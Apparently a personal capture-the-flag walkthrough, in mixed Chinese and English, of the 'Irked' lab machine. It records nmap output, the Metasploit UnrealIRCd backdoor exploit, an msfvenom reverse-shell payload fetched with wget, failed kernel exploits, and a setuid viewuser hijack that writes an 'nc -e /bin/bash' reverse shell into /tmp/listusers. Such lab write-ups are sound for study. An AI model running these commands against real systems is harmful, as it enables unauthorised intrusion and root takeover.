info:

nmap -sS -Pn IP
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)


22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
49074/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

80

<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>

Apache/2.4.10

10.10.10.117/manual/img/

IRC

searchsploit UnrealIRCd

浏览器访问以下地址，6697获得了一条信息：“ERROR :Closing Link: [10.10.14.13] (Throttled: Reconnecting too fast) -Email djmardov@irked.htb for more information.”
10.10.10.117:6697
10.10.10.117:8067
10.10.10.117:65534

search UnrealIRCd

irc.rc

msfconsole -r irc.rc

use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST IP
set RPORT 6697
run

shell
python -c 'import pty; pty.spawn("/bin/bash")'

获得一个shell
find . -name "user.txt" 2>/dev/null 尝试获得user.txt，权限不够

提权

os : Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

pwd:  /home/ircd/Unreal3.2

whoami : ircd

cat /etc/passwd | grep home
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh

cd /;find . -name "user.txt" 2>/dev/null
./home/djmardov/Documents/user.txt

python -c 'import pty; pty.spawn("/bin/bash")'
su djmardov

cat unrealircd.conf | grep pass
获得疑似口令：f00Ness、f00、moocowsrulemyworld、LiNk

find . -name "id_rsa" 2>/dev/null
find . -name "*.pub"找到了一个路径，查看ssh配置文件

gcc -v
gcc version 4.9.2 (Debian 4.9.2-10+deb8u1)

sudo not found

尝试1

Linux Kernel 3.0 < 3.3.5
提权失败

use post/multi/recon/local_exploit_suggester没有发现任何可用exp

尝试2

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=7766 -f elf -o payload.elf

wget http://10.10.14.7/payload.elf

local_exploit_suggester，有收获，但exp执行不成功

[+] 10.10.10.117 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The target service is running, but could not be validated.
[+] 10.10.10.117 - exploit/linux/local/pkexec: The target service is running, but could not be validated.
[*] Post module execution completed

尝试3

python -m SimpleHTTPServer 8088
wget http://10.10.14.7:8088/linux-exploit-suggester.sh

./linux-exploit-suggester.sh

Available information:

Kernel version: 3.16.0
Architecture: i686
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

---
searchsploit linux 3.16

- 尝试shell脚本提示可能有的漏洞dirtyc0w.c
- CVE-2017-7533
失败

尝试4

root@irked:/tmp# file /usr/bin/viewuser
file /usr/bin/viewuser
/usr/bin/viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped

strings /usr/bin/viewuser
发现里面有一个/tmp/listusers，查看一下是ascii字符，内容为/bin/bash

---

file /tmp/listusers
/tmp/listusers: ASCII text

cat /tmp/listusers
/bin/bash

---

ls -al /tmp/listusers
-rwxr-xr-x 1 djmardov djmardov 10 Mar  9 14:58 /tmp/listusers

/usr/bin/viewuser
cd /usr/bin/; ./viewuser

This application is being devleoped to set and test user permissions
It is still being actively developed 它仍在积极开发中
(unknown) :0           2019-03-09 14:53 (:0)

rm /tmp/listusers
./viewuser 

---

ps -ef | grep viewuser

虽然是以ircd用户运行的viewuser，可以看到进程是以root用户执行的

---

whereis nc
nc -h
echo "/bin/bash  nc -e /bin/bash 10.10.14.7 2233" >/tmp/listusers
cat /tmp/listusers

/bin/bash  nc -e /bin/bash 10.10.14.7 2233

本地运行nc -lnvp 2233

cd /usr/bin/; ./viewuser
结果：sh: 1: /tmp/listusers: Permission denied

ls -al /tmp/listusers
-rw------- 1 root ircd 43 Mar 10 03:54 /tmp/listusers

chmod +x /tmp/listusers

ls -al /tmp/listusers
-rwx------  1 root ircd   43 Mar 10 03:58 listusers

cd /usr/bin/; ./viewuser
结果
/bin/nc: /bin/nc: cannot execute binary file

nc -e /bin/bash 10.10.14.7 2233